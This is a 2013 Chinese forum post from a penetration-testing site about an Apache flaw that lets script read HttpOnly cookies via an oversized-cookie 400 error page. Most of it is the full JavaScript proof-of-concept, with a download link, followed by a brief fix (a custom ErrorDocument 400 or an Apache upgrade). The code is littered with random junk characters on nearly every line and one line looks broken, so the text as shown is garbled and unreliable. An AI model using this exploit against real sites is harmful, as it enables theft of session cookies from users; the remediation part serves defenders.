中国网络渗透测试联盟

标题: Apache HttpOnly Cookie XSS跨站漏洞 [打印本页]
作者: admin    时间: 2013-4-19 19:15
标题: Apache HttpOnly Cookie XSS跨站漏洞
很多程序以及一些商业或者成熟开源的cms文章系统为了防止xss盗取用户cookie的问题,一般都采用给cookie加上httponly的属性,来禁止直接使用js得到用户的cookie,从而降低xss的危害,而这个问题刚好可以用来绕过cookie的这个httponly的属性。
/ a' r1 k; ?* z4 V- d! x5 a6 i# j4 L6 E
用chrome打开一个站点,F12打开开发者工具,找到console输入如下代码并回车:$ @7 ?4 c, z: z% ]( A/ w' E
: g/ W- I& g9 C! ^$ \4 V, C( M

7 U, U$ E3 H5 m+ w* h2 P: d// http://www.exploit-db.com/exploits/18442/8 n) y1 ]; ]! b  F) x7 w2 i1 b
function setCookies (good) {
% P- ]) Q% T& {// Construct string for cookie value
- |2 A% `$ I- i0 W* u9 ?var str = "";
4 u4 |9 a4 w: m$ ?8 ?for (var i=0; i< 819; i++) {% Y; J( q- ?; w* V
str += "x";
- p0 K3 }1 N2 D) g$ {}
7 u+ ^* `+ B. \// Set cookies
3 G4 K5 b1 z. O; f. f3 c  d: @$ E( sfor (i = 0; i < 10; i++) {6 z9 @9 }( N& C6 o
// Expire evil cookie
- }2 H/ K: e6 p+ M- Eif (good) {
$ Q) Z1 A% Q9 @0 Tvar cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";6 L# G0 S2 Q2 N7 G: G
}
* t% D) V; m$ Z2 ]4 p( u// Set evil cookie
" I  X% [0 {! v' V" d8 belse {
* _& p2 E- w& s" T" b; cvar cookie = "xss"+i+"="+str+";path=/";
, [* x. q( @% L  Q6 \7 K}
- }- g8 r9 N& P/ S/ N, Ldocument.cookie = cookie;7 ?+ A- R2 {. Q% ^1 C0 Y
}& i5 o7 |! E' \$ Q) c% t
}& L  D& ~$ w. }8 X1 I; f% _8 @
function makeRequest() {( _* M7 `6 |5 t4 k' O' s
setCookies();4 y- M4 g* Y. _# J, k" m7 B
function parseCookies () {
3 m! O+ D4 i" z6 @$ l+ G  pvar cookie_dict = {};
) W: t6 g  M. [0 R; B  P0 R$ `// Only react on 400 status
! Y+ i0 H( O( f/ gif (xhr.readyState === 4 && xhr.status === 400) {
% S! X# F0 x- Y8 y' @// Replace newlines and match <pre> content
" A+ i8 B. @3 [" S) H8 f  z7 hvar content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
9 J# N7 g! f+ [* |if (content.length) {+ z; j1 _8 F3 N, z. B# x
// Remove Cookie: prefix
: F. F8 u. @+ Acontent = content[1].replace("Cookie: ", "");' R7 L, t) X$ _% _% _1 j7 a0 T
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);6 I+ t/ Y$ ?0 w* |2 {- ?$ e' p
// Add cookies to object
7 |+ L% _  i4 `2 h  w, \, h' dfor (var i=0; i<cookies.length; i++) {
+ [0 m) m7 Z* K% R" ]! R4 R7 U& cvar s_c = cookies.split('=',2);
$ D: K% x6 ^5 D+ j  b8 L( @* h  Bcookie_dict[s_c[0]] = s_c[1];2 m7 t( O: M" K5 i  r! P3 p7 m
}# ]1 T4 W% |7 y# ^( s2 ^4 S
}
; B6 ]! J' B$ l$ t3 }; Z; @: s// Unset malicious cookies
/ {; Y- K; e1 [3 o2 f7 z6 FsetCookies(true);' j' L4 m. E, R1 l7 \  \/ r
alert(JSON.stringify(cookie_dict));
" W. p( c6 g. h& W7 c  {& w% A}
; x; u7 D: k; V; p$ j1 }: F}
, H* H, H$ @  l9 Q/ W// Make XHR request" w; C! t0 _0 p1 C; Z
var xhr = new XMLHttpRequest();
+ D, ~+ n% x  Y5 q8 g! `7 }0 Yxhr.onreadystatechange = parseCookies;
, ]* J2 B0 D/ g& c3 Uxhr.open("GET", "/", true);
* B7 d  q) n" E4 e! Vxhr.send(null);' |% V- I& P# @& f
}
+ O% X, V4 {* y5 fmakeRequest();7 M4 Q' f# U0 Q$ T3 l5 L

# J- g* g3 \2 C2 v你就能看见华丽丽的400错误包含着cookie信息。
* I" ~' i+ h* {/ }3 |: V) p/ `# V) d' l4 m" t# c
下载地址:https://gist.github.com/pilate/1955a1c28324d4724b7b/download#4 [% b4 [6 ?& f* M# [3 G
9 g4 d* U7 ~- d1 j& H( X
修复方案:
& \8 p  R$ K9 R& y1 Q5 V3 o  V$ ?4 y, M2 n' Z
Apache官方提供4种错误处理方式(http://httpd.apache.org/docs/2.0/mod/core.html#errordocument),如下9 }0 ^' u0 [7 ~  G; j4 @! j+ b
- `  n( d- B/ _: L) y0 ]6 N
In the event of a problem or error, Apachecan be configured to do one of four things,
. S- j2 O+ K- O1 b- }+ i- P( D6 |: ]: F; i
1. output asimple hardcoded error message输出一个简单生硬的错误代码信息" Q* t* ~1 g) m1 o. {
2. output acustomized message输出一段信息
# B, e; ]0 @: V1 W( n8 z7 L3 @& E3. redirect to alocal URL-path to handle the problem/error转向一个本地的自定义页面
! k( A# P/ j8 V. N" ]9 m, H4. redirect to an external URL to handle theproblem/error转向一个外部URL
% M8 t2 ?* |/ E. q% Y- f0 F# A' e" }! j' J( l7 Z
经测试,对于400错误只有方法2有效,返回包不会再包含cookie内容' J% p& _" n$ j) J* x

  c; e7 G, ?6 g9 p4 dApache配置:
0 ^3 w3 A3 e0 P* [9 D) d0 H5 ]) N- K5 Y3 e
ErrorDocument400 " security test"
2 F+ {: S" i0 B  Q$ G5 f% g: V% @* F
当然,升级apache到最新也可:)。% C+ [# Z/ \; L0 Z
* V# g5 @2 G) [! L& b. @1 ]
参考:http://httpd.apache.org/security/vulnerabilities_22.html4 a/ L# B  q: n

* t4 j5 B4 B3 v$ ~. Z



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2